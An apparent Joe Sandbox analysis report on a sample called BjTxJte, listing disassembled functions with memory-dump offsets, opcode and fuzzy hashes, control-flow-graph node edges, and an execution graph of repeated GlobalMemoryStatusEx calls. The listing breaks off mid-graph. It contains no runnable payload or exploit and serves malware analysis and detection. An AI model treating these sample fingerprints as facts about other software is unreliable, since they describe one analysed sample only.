                                  Function 0140D006 Relevance: .1, Instructions: 62COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2225776290.000000000140D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0140D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_140d000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a66646bd057be263d6adb21d13868b2727576b4a25597b89521cc721bef1daf8
                                  • Instruction ID: e81026f452ada94532945bdfacb700d21249b52228d27b02827ca690c98bad1c
                                  • Opcode Fuzzy Hash: a66646bd057be263d6adb21d13868b2727576b4a25597b89521cc721bef1daf8
                                  • Instruction Fuzzy Hash: 402192755093808FDB03CF64D994716BF71EB46214F28C5EBD8498F6A7C33A980ACB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 013FD4BF Relevance: .1, Instructions: 56COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2225695976.00000000013FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013FD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_13fd000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                  • Instruction ID: 1f09f92946792221ed4251fe2a22984fe9be958d21956febcfcda8ae22348654
                                  • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                  • Instruction Fuzzy Hash: 5E11DF72404280CFCB02CF54D5C8B16BF71FB88318F24C6ADD9490B256C336D45ADBA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 013FD3D3 Relevance: .1, Instructions: 56COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2225695976.00000000013FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013FD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_13fd000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                  • Instruction ID: 7239309409ab5a2758b9eb6712a65aa577bcd53aede761f3ad0516c1b8da541c
                                  • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                  • Instruction Fuzzy Hash: E411CD72404240CFDB02CF44D5C4B56BF61FB84224F24C6A9DA090A656C33AE45ACBA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0140D1CF Relevance: .1, Instructions: 53COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2225776290.000000000140D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0140D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_140d000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                  • Instruction ID: 513c7446042d04eb2e8f5ac99a825e1fae1cd20736e8d1677adcac34cfb01d98
                                  • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                  • Instruction Fuzzy Hash: 3E11BE75904240DFDB02CF98C5C4B16BF61FB84224F24C6AED8494B7A6C33AD40ACB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 013FD745 Relevance: .0, Instructions: 45COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2225695976.00000000013FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013FD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_13fd000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 64419e0b0af577ae63d5636b123bcf466383a932bdf23a18d09e643f0c19fc19
                                  • Instruction ID: 85813c2b4424df87797fdd5beae67337a7c68b26f7881a6eaf10ae3b97b8a192
                                  • Opcode Fuzzy Hash: 64419e0b0af577ae63d5636b123bcf466383a932bdf23a18d09e643f0c19fc19
                                  • Instruction Fuzzy Hash: 27012B310043849AE7219F99CD88B67BF9CEF45328F18C52EEF090E297C2399805CA71
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 013FD744 Relevance: .0, Instructions: 36COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2225695976.00000000013FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013FD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_13fd000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 07e5c14d1ff73eaf9f56895ede8baf684761ad35fdac66da282ecd8a0726de9d
                                  • Instruction ID: 3ff9634df26b8fefc2262882ba27ce7371ad3c04896884480997f59405475b20
                                  • Opcode Fuzzy Hash: 07e5c14d1ff73eaf9f56895ede8baf684761ad35fdac66da282ecd8a0726de9d
                                  • Instruction Fuzzy Hash: 66F062714043849EE7119E1AC888B62FF98EF95634F18C45AEE484E297C2799845CAB5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:8%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:0%
                                  Total number of Nodes:24
                                  Total number of Limit Nodes:6
                                  execution_graph 37890 1e70848 37892 1e7084e 37890->37892 37891 1e7091b 37892->37891 37895 1e714b7 37892->37895 37901 1e7138f 37892->37901 37897 1e713a6 37895->37897 37898 1e714bb 37895->37898 37896 1e714b4 37896->37892 37897->37896 37900 1e714b7 2 API calls 37897->37900 37906 1e78228 37897->37906 37898->37892 37900->37897 37902 1e71383 37901->37902 37903 1e71393 37901->37903 37902->37892 37903->37902 37904 1e714b7 2 API calls 37903->37904 37905 1e78228 2 API calls 37903->37905 37904->37903 37905->37903 37907 1e78232 37906->37907 37908 1e7824c 37907->37908 37911 6f4f9f7 37907->37911 37915 6f4fa08 37907->37915 37908->37897 37912 6f4fa1d 37911->37912 37913 6f4fc2e 37912->37913 37914 6f4fc49 GlobalMemoryStatusEx GlobalMemoryStatusEx 37912->37914 37913->37908 37914->37912 37916 6f4fa1d 37915->37916 37917 6f4fc2e 37916->37917 37918 6f4fc49 GlobalMemoryStatusEx GlobalMemoryStatusEx 37916->37918 37917->37908 37918->37916

                                  Executed Functions

                                  Function 06F43438 Relevance: 8.0, Strings: 6, Instructions: 545COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 124 6f43438-6f43459 125 6f4345b-6f4345e 124->125 126 6f43484-6f43487 125->126 127 6f43460-6f4347f 125->127 128 6f4348d-6f434ac 126->128 129 6f43c28-6f43c2a 126->129 127->126 137 6f434c5-6f434cf 128->137 138 6f434ae-6f434b1 128->138 131 6f43c31-6f43c34 129->131 132 6f43c2c 129->132 131->125 133 6f43c3a-6f43c43 131->133 132->131 142 6f434d5-6f434e4 137->142 138->137 139 6f434b3-6f434c3 138->139 139->142 253 6f434e6 call 6f43c51 142->253 254 6f434e6 call 6f43c58 142->254 143 6f434eb-6f434f0 144 6f434f2-6f434f8 143->144 145 6f434fd-6f437da 143->145 144->133 166 6f437e0-6f4388f 145->166 167 6f43c1a-6f43c27 145->167 176 6f43891-6f438b6 166->176 177 6f438b8 166->177 179 6f438c1-6f438d4 call 6f43024 176->179 177->179 182 6f43c01-6f43c0d 179->182 183 6f438da-6f438fc call 6f43030 179->183 182->166 184 6f43c13 182->184 183->182 187 6f43902-6f4390c 183->187 184->167 187->182 188 6f43912-6f4391d 187->188 188->182 189 6f43923-6f439f9 188->189 201 6f43a07-6f43a37 189->201 202 6f439fb-6f439fd 189->202 206 6f43a45-6f43a51 201->206 207 6f43a39-6f43a3b 201->207 202->201 208 6f43ab1-6f43ab5 206->208 209 6f43a53-6f43a57 206->209 207->206 210 6f43bf2-6f43bfb 208->210 211 6f43abb-6f43af7 208->211 209->208 212 6f43a59-6f43a83 209->212 210->182 210->189 224 6f43b05-6f43b13 211->224 225 6f43af9-6f43afb 211->225 219 6f43a85-6f43a87 212->219 220 6f43a91-6f43aae call 6f4303c 212->220 219->220 220->208 227 6f43b15-6f43b20 224->227 228 6f43b2a-6f43b35 224->228 225->224 227->228 231 6f43b22 227->231 232 6f43b37-6f43b3d 228->232 233 6f43b4d-6f43b5e 228->233 231->228 234 6f43b41-6f43b43 232->234 235 6f43b3f 232->235 237 6f43b76-6f43b82 233->237 238 6f43b60-6f43b66 233->238 234->233 235->233 242 6f43b84-6f43b8a 237->242 243 6f43b9a-6f43beb 237->243 239 6f43b68 238->239 240 6f43b6a-6f43b6c 238->240 239->237 240->237 244 6f43b8c 242->244 245 6f43b8e-6f43b90 242->245 243->210 244->243 245->243 253->143 254->143
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.3332388584.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_6f40000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq$$jq$$jq$$jq$$jq
                                  • API String ID: 0-3356825164
                                  • Opcode ID: 4956c85a5527b8b0f89c214b2a3bd3089dfcbe5dc56f881b56f67405c138c744
                                  • Instruction ID: 8eb82619f281f8e34a9f96f1ed6bf673a7727b6124e77768c5ee5a22f609022c
                                  • Opcode Fuzzy Hash: 4956c85a5527b8b0f89c214b2a3bd3089dfcbe5dc56f881b56f67405c138c744
                                  • Instruction Fuzzy Hash: 0D323F31E1065A8FDB14EF65D89069DF7B2FF89300F20C669D409AB664EB30AD85CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06F47D50 Relevance: 3.0, Strings: 2, Instructions: 477COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 796 6f47d50-6f47d6e 797 6f47d70-6f47d73 796->797 798 6f47d94-6f47d97 797->798 799 6f47d75-6f47d8f 797->799 800 6f47d99-6f47db5 798->800 801 6f47dba-6f47dbd 798->801 799->798 800->801 803 6f47dbf-6f47dc9 801->803 804 6f47dca-6f47dcd 801->804 806 6f47de4-6f47de6 804->806 807 6f47dcf-6f47ddd 804->807 808 6f47ded-6f47df0 806->808 809 6f47de8 806->809 812 6f47df6-6f47e0c 807->812 814 6f47ddf 807->814 808->797 808->812 809->808 816 6f48027-6f48031 812->816 817 6f47e12-6f47e1b 812->817 814->806 818 6f47e21-6f47e3e 817->818 819 6f48032-6f4803c 817->819 829 6f48014-6f48021 818->829 830 6f47e44-6f47e6c 818->830 822 6f48093-6f4809e 819->822 823 6f4803e-6f48067 819->823 833 6f480a0-6f480e4 822->833 834 6f48083-6f48090 822->834 824 6f48069-6f4806c 823->824 826 6f482a1-6f482a4 824->826 827 6f48072-6f48081 824->827 831 6f482a6-6f482c2 826->831 832 6f482c7-6f482ca 826->832 827->833 827->834 829->816 829->817 830->829 849 6f47e72-6f47e7b 830->849 831->832 837 6f48375-6f48377 832->837 838 6f482d0-6f482dc 832->838 847 6f48275-6f4828b 833->847 848 6f480ea-6f480fb 833->848 834->822 839 6f4837e-6f48381 837->839 840 6f48379 837->840 846 6f482e7-6f482e9 838->846 839->824 844 6f48387-6f48390 839->844 840->839 852 6f48301-6f48305 846->852 853 6f482eb-6f482f1 846->853 847->826 860 6f48260-6f4826f 848->860 861 6f48101-6f4811e 848->861 849->819 857 6f47e81-6f47e9d 849->857 855 6f48307-6f48311 852->855 856 6f48313 852->856 858 6f482f5-6f482f7 853->858 859 6f482f3 853->859 862 6f48318-6f4831a 855->862 856->862 869 6f48002-6f4800e 857->869 870 6f47ea3-6f47ecd 857->870 858->852 859->852 860->847 860->848 861->860 874 6f48124-6f4821a call 6f46580 861->874 864 6f4831c-6f4831f 862->864 865 6f4832b-6f48364 862->865 864->844 865->827 884 6f4836a-6f48374 865->884 869->829 869->849 882 6f47ed3-6f47efb 870->882 883 6f47ff8-6f47ffd 870->883 931 6f4821c-6f48226 874->931 932 6f48228 874->932 882->883 890 6f47f01-6f47f2f 882->890 883->869 890->883 896 6f47f35-6f47f3e 890->896 896->883 897 6f47f44-6f47f76 896->897 904 6f47f81-6f47f9d 897->904 905 6f47f78-6f47f7c 897->905 904->869 908 6f47f9f-6f47ff6 call 6f46580 904->908 905->883 907 6f47f7e 905->907 907->904 908->869 933 6f4822d-6f4822f 931->933 932->933 933->860 934 6f48231-6f48236 933->934 935 6f48244 934->935 936 6f48238-6f48242 934->936 937 6f48249-6f4824b 935->937 936->937 937->860 938 6f4824d-6f48259 937->938 938->860
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.3332388584.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_6f40000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq
                                  • API String ID: 0-3720491408
                                  • Opcode ID: 36a3ad5b805e62391b3f47a1b33eef4392d5b8700e87f221a5b0e3aa1cf81287
                                  • Instruction ID: dd31fe0674ffe797cde079028b45dc5dbaee11b219c45e90e75b792dd8aa50ff
                                  • Opcode Fuzzy Hash: 36a3ad5b805e62391b3f47a1b33eef4392d5b8700e87f221a5b0e3aa1cf81287
                                  • Instruction Fuzzy Hash: 0502B030F002058FDB54EB69E690AAEBBB2FF84350F148529E415EB795DB35EC42CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06F45570 Relevance: 1.8, Strings: 1, Instructions: 598COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1276 6f45570-6f4558d 1277 6f4558f-6f45592 1276->1277 1278 6f45594-6f4559b 1277->1278 1279 6f455a0-6f455a3 1277->1279 1278->1279 1280 6f455a5-6f455ab 1279->1280 1281 6f455b6-6f455b9 1279->1281 1282 6f455b1 1280->1282 1283 6f456cc-6f456da 1280->1283 1284 6f455c1-6f455c4 1281->1284 1285 6f455bb-6f455bc 1281->1285 1282->1281 1292 6f456e1-6f456e4 1283->1292 1286 6f455d5-6f455d8 1284->1286 1287 6f455c6-6f455ca 1284->1287 1285->1284 1290 6f4560d-6f45610 1286->1290 1291 6f455da-6f455dd 1286->1291 1288 6f455d0 1287->1288 1289 6f4573c-6f45748 1287->1289 1288->1286 1296 6f45617-6f4561a 1290->1296 1297 6f45612-6f45614 1290->1297 1293 6f455e3-6f455ee 1291->1293 1294 6f45749-6f45773 1291->1294 1295 6f456e9-6f456ec 1292->1295 1293->1294 1298 6f455f4-6f455fe 1293->1298 1317 6f4577d-6f45780 1294->1317 1299 6f45703-6f45706 1295->1299 1300 6f456ee-6f456fe 1295->1300 1296->1280 1301 6f4561c-6f4561f 1296->1301 1297->1296 1298->1294 1304 6f45604-6f45608 1298->1304 1302 6f45708-6f45725 1299->1302 1303 6f4572a-6f4572c 1299->1303 1300->1299 1306 6f45636-6f45639 1301->1306 1307 6f45621-6f45631 1301->1307 1302->1303 1310 6f45733-6f45736 1303->1310 1311 6f4572e 1303->1311 1304->1290 1308 6f45643-6f45646 1306->1308 1309 6f4563b-6f4563e 1306->1309 1307->1306 1315 6f45655-6f45658 1308->1315 1316 6f45648-6f4564e 1308->1316 1309->1308 1310->1277 1310->1289 1311->1310 1315->1316 1319 6f4565a-6f4565d 1315->1319 1316->1291 1318 6f45650 1316->1318 1320 6f457a2-6f457a5 1317->1320 1321 6f45782-6f45786 1317->1321 1318->1315 1325 6f45667-6f4566a 1319->1325 1326 6f4565f-6f45662 1319->1326 1322 6f457b6-6f457b9 1320->1322 1323 6f457a7-6f457b1 1320->1323 1327 6f4578c-6f45794 1321->1327 1328 6f4586e-6f458ac 1321->1328 1330 6f457db-6f457de 1322->1330 1331 6f457bb-6f457bf 1322->1331 1323->1322 1332 6f4566c-6f45672 1325->1332 1333 6f45679-6f4567c 1325->1333 1326->1325 1327->1328 1329 6f4579a-6f4579d 1327->1329 1342 6f458ae-6f458b1 1328->1342 1329->1320 1337 6f457e0-6f457e4 1330->1337 1338 6f457fc-6f457ff 1330->1338 1331->1328 1336 6f457c5-6f457cd 1331->1336 1332->1326 1339 6f45674 1332->1339 1340 6f4567e-6f45694 1333->1340 1341 6f45699-6f4569c 1333->1341 1336->1328 1345 6f457d3-6f457d6 1336->1345 1337->1328 1346 6f457ea-6f457f2 1337->1346 1347 6f45801-6f45808 1338->1347 1348 6f4580f-6f45812 1338->1348 1339->1333 1340->1341 1343 6f4569e-6f456a7 1341->1343 1344 6f456a8-6f456ab 1341->1344 1352 6f458b3-6f458c4 1342->1352 1353 6f458cf-6f458d2 1342->1353 1354 6f456c7-6f456ca 1344->1354 1355 6f456ad-6f456c2 1344->1355 1345->1330 1346->1328 1356 6f457f4-6f457f7 1346->1356 1357 6f45866-6f4586d 1347->1357 1358 6f4580a 1347->1358 1350 6f45814-6f4581b 1348->1350 1351 6f4581c-6f4581f 1348->1351 1359 6f45837-6f4583a 1351->1359 1360 6f45821-6f45832 1351->1360 1370 6f45bcd-6f45bd4 1352->1370 1371 6f458ca 1352->1371 1361 6f458d8-6f45a6c 1353->1361 1362 6f45bbb-6f45bbe 1353->1362 1354->1283 1354->1295 1355->1354 1356->1338 1358->1348 1367 6f45854-6f45856 1359->1367 1368 6f4583c-6f45840 1359->1368 1360->1359 1425 6f45ba5-6f45bb8 1361->1425 1426 6f45a72-6f45a79 1361->1426 1364 6f45bc0-6f45bc5 1362->1364 1365 6f45bc8-6f45bcb 1362->1365 1364->1365 1365->1370 1372 6f45bd9-6f45bdc 1365->1372 1375 6f4585d-6f45860 1367->1375 1376 6f45858 1367->1376 1368->1328 1373 6f45842-6f4584a 1368->1373 1370->1372 1371->1353 1377 6f45bf4-6f45bf7 1372->1377 1378 6f45bde-6f45bf1 1372->1378 1373->1328 1379 6f4584c-6f4584f 1373->1379 1375->1317 1375->1357 1376->1375 1381 6f45c11-6f45c14 1377->1381 1382 6f45bf9-6f45c0a 1377->1382 1379->1367 1381->1361 1383 6f45c1a-6f45c1d 1381->1383 1390 6f45c45-6f45c56 1382->1390 1391 6f45c0c 1382->1391 1383->1361 1385 6f45c23-6f45c26 1383->1385 1388 6f45c40-6f45c43 1385->1388 1389 6f45c28-6f45c39 1385->1389 1388->1390 1392 6f45c61-6f45c64 1388->1392 1389->1378 1399 6f45c3b 1389->1399 1390->1370 1400 6f45c5c 1390->1400 1391->1381 1396 6f45c66-6f45c6d 1392->1396 1397 6f45c72-6f45c75 1392->1397 1396->1397 1401 6f45c77-6f45c88 1397->1401 1402 6f45c93-6f45c95 1397->1402 1399->1388 1400->1392 1401->1370 1408 6f45c8e 1401->1408 1403 6f45c97 1402->1403 1404 6f45c9c-6f45c9f 1402->1404 1403->1404 1404->1342 1407 6f45ca5-6f45cae 1404->1407 1408->1402 1427 6f45b2d-6f45b34 1426->1427 1428 6f45a7f-6f45ab2 1426->1428 1427->1425 1430 6f45b36-6f45b69 1427->1430 1439 6f45ab4 1428->1439 1440 6f45ab7-6f45af8 1428->1440 1441 6f45b6e-6f45b9b 1430->1441 1442 6f45b6b 1430->1442 1439->1440 1450 6f45b10-6f45b17 1440->1450 1451 6f45afa-6f45b0b 1440->1451 1441->1407 1442->1441 1453 6f45b1f-6f45b21 1450->1453 1451->1407 1453->1407
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.3332388584.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_6f40000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $
                                  • API String ID: 0-3993045852
                                  • Opcode ID: 549d5573c33285ee3446106939a164b31d0e32cb42b2e9f872d722a066e5397a
                                  • Instruction ID: 721d8ed374d8852ecf4b6a50bef687876afea98610e0a6efb776086126a791df
                                  • Opcode Fuzzy Hash: 549d5573c33285ee3446106939a164b31d0e32cb42b2e9f872d722a066e5397a
                                  • Instruction Fuzzy Hash: 1322DF71E002199FDF60FBA4C5806AEBBB2FF89320F20856AD515AB794DB35DC45CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06F465D0 Relevance: .8, Instructions: 824COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.3332388584.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_6f40000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d584586b4bdac84ae7504c08b2cb86fe69f4e1e835a5604086580c67832d0512
                                  • Instruction ID: 9b92c3cdb87725e37cdcded9ba66f14430ce612b9f7bf5f1154622c8809bcb17
                                  • Opcode Fuzzy Hash: d584586b4bdac84ae7504c08b2cb86fe69f4e1e835a5604086580c67832d0512
                                  • Instruction Fuzzy Hash: 78629B34E002058FDB54EB68D684BADBBF2EF89314F248429E406DB795DB75EC46CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06F4C140 Relevance: .6, Instructions: 643COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.3332388584.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_6f40000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5782ae8589bc67c66baa35856e406a32d769b59970cd0e8160b580c0e1e4ff63
                                  • Instruction ID: ab1ffbcede40608475561148a7f278ed83cb2e374903004ec51282331acc33af
                                  • Opcode Fuzzy Hash: 5782ae8589bc67c66baa35856e406a32d769b59970cd0e8160b580c0e1e4ff63
                                  • Instruction Fuzzy Hash: 2D327E34F012099FDB54EB69E980AADBBB6FF88310F109529E405EB755DB39EC41CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06F4B1F0 Relevance: .6, Instructions: 578COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.3332388584.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_6f40000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 149cb77f8a005ab3777ffd9b58a28f9a1f045f4fb492a457324c498e5ab435b9
                                  • Instruction ID: 74a6c7c1f8344a61a015635f1861d3952bb66a663b21074dcd78618e039090e6
                                  • Opcode Fuzzy Hash: 149cb77f8a005ab3777ffd9b58a28f9a1f045f4fb492a457324c498e5ab435b9
                                  • Instruction Fuzzy Hash: 42228330E101099FEF64EF69D5807AEBBB6FB85310F208526E405DB796DA39DC81CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06F4AC98 Relevance: 10.4, Strings: 8, Instructions: 396COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 6f4ac98-6f4acb6 1 6f4acb8-6f4acbb 0->1 2 6f4acbd-6f4acd9 1->2 3 6f4acde-6f4ace1 1->3 2->3 4 6f4ace3-6f4ace8 3->4 5 6f4aceb-6f4acee 3->5 4->5 6 6f4acf0-6f4acf4 5->6 7 6f4acff-6f4ad02 5->7 9 6f4aec4-6f4aece 6->9 10 6f4acfa 6->10 11 6f4ad04-6f4ad0d 7->11 12 6f4ad12-6f4ad15 7->12 10->7 11->12 13 6f4ad17-6f4ad24 12->13 14 6f4ad29-6f4ad2c 12->14 13->14 16 6f4ad46-6f4ad49 14->16 17 6f4ad2e-6f4ad37 14->17 21 6f4aeb5-6f4aebe 16->21 22 6f4ad4f-6f4ad52 16->22 19 6f4ad3d-6f4ad41 17->19 20 6f4aecf-6f4af06 17->20 19->16 28 6f4af08-6f4af0b 20->28 21->9 21->17 23 6f4ad54-6f4ad67 22->23 24 6f4ad6c-6f4ad6e 22->24 23->24 25 6f4ad75-6f4ad78 24->25 26 6f4ad70 24->26 25->1 30 6f4ad7e-6f4ada2 25->30 26->25 31 6f4af0d-6f4af11 28->31 32 6f4af18-6f4af1b 28->32 48 6f4aeb2 30->48 49 6f4ada8-6f4adb7 30->49 33 6f4af13 31->33 34 6f4af69-6f4afa4 31->34 35 6f4af1d-6f4af39 32->35 36 6f4af3e-6f4af41 32->36 33->32 46 6f4b197-6f4b1aa 34->46 47 6f4afaa-6f4afb6 34->47 35->36 38 6f4af43-6f4af4d 36->38 39 6f4af4e-6f4af51 36->39 43 6f4af60-6f4af63 39->43 44 6f4af53 call 6f4b1f0 39->44 43->34 45 6f4b1cc-6f4b1ce 43->45 54 6f4af59-6f4af5b 44->54 52 6f4b1d5-6f4b1d8 45->52 53 6f4b1d0 45->53 50 6f4b1ac 46->50 58 6f4afd6-6f4b01a 47->58 59 6f4afb8-6f4afd1 47->59 48->21 60 6f4adcf-6f4ae0a call 6f46580 49->60 61 6f4adb9-6f4adbf 49->61 50->45 52->28 56 6f4b1de-6f4b1e8 52->56 53->52 54->43 75 6f4b036-6f4b075 58->75 76 6f4b01c-6f4b02e 58->76 59->50 77 6f4ae22-6f4ae39 60->77 78 6f4ae0c-6f4ae12 60->78 62 6f4adc1 61->62 63 6f4adc3-6f4adc5 61->63 62->60 63->60 84 6f4b15c-6f4b171 75->84 85 6f4b07b-6f4b156 call 6f46580 75->85 76->75 89 6f4ae51-6f4ae62 77->89 90 6f4ae3b-6f4ae41 77->90 79 6f4ae14 78->79 80 6f4ae16-6f4ae18 78->80 79->77 80->77 84->46 85->84 97 6f4ae64-6f4ae6a 89->97 98 6f4ae7a-6f4aeab 89->98 92 6f4ae45-6f4ae47 90->92 93 6f4ae43 90->93 92->89 93->89 100 6f4ae6c 97->100 101 6f4ae6e-6f4ae70 97->101 98->48 100->98 101->98
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.3332388584.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_6f40000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq
                                  • API String ID: 0-666546452
                                  • Opcode ID: 91d8da94bc29cc684c50f2b12d9efe7acbfa8a434795d7d7f3f604d3a390476d
                                  • Instruction ID: 2ae62d5a7ddf610b1e682cbb06793380c784586c80aeb51bd6b189e17b4087a7
                                  • Opcode Fuzzy Hash: 91d8da94bc29cc684c50f2b12d9efe7acbfa8a434795d7d7f3f604d3a390476d
                                  • Instruction Fuzzy Hash: FDE1A130E402098FDB65EF69D9806AEBBB6FF85300F208529D815EB759DB34DC46CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06F4B610 Relevance: 8.0, Strings: 6, Instructions: 470COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 255 6f4b610-6f4b632 256 6f4b634-6f4b637 255->256 257 6f4b639-6f4b696 call 6f46580 256->257 258 6f4b69b-6f4b69e 256->258 257->258 259 6f4b6a4-6f4b6a7 258->259 260 6f4b7e2-6f4b7e3 258->260 262 6f4b6be-6f4b6c1 259->262 263 6f4b6a9-6f4b6ad 259->263 261 6f4b7e8-6f4b7eb 260->261 268 6f4b80d-6f4b810 261->268 269 6f4b7ed-6f4b808 261->269 266 6f4b6c3-6f4b6c6 262->266 267 6f4b6d8-6f4b6db 262->267 270 6f4b9a7-6f4b9de 263->270 271 6f4b6b3-6f4b6b9 263->271 266->270 273 6f4b6cc-6f4b6d3 266->273 274 6f4b6dd-6f4b6e6 267->274 275 6f4b6eb-6f4b6ee 267->275 276 6f4b812-6f4b815 268->276 277 6f4b81a-6f4b81d 268->277 269->268 289 6f4b9e0-6f4b9e3 270->289 271->262 273->267 274->275 278 6f4b6f0-6f4b705 275->278 279 6f4b72c-6f4b72f 275->279 276->277 282 6f4b887-6f4b890 277->282 283 6f4b81f-6f4b822 277->283 278->270 305 6f4b70b-6f4b727 278->305 290 6f4b731-6f4b746 279->290 291 6f4b76e-6f4b771 279->291 284 6f4b896 282->284 285 6f4b913-6f4b91c 282->285 286 6f4b824-6f4b82b 283->286 287 6f4b836-6f4b839 283->287 292 6f4b89b-6f4b89e 284->292 285->270 294 6f4b922-6f4b929 285->294 286->274 293 6f4b831 286->293 295 6f4b85c-6f4b85f 287->295 296 6f4b83b-6f4b857 287->296 300 6f4b9e5-6f4ba01 289->300 301 6f4ba06-6f4ba09 289->301 290->270 318 6f4b74c-6f4b769 290->318 297 6f4b783-6f4b786 291->297 298 6f4b773 291->298 303 6f4b8c5-6f4b8c8 292->303 304 6f4b8a0-6f4b8a4 292->304 293->287 309 6f4b92e-6f4b931 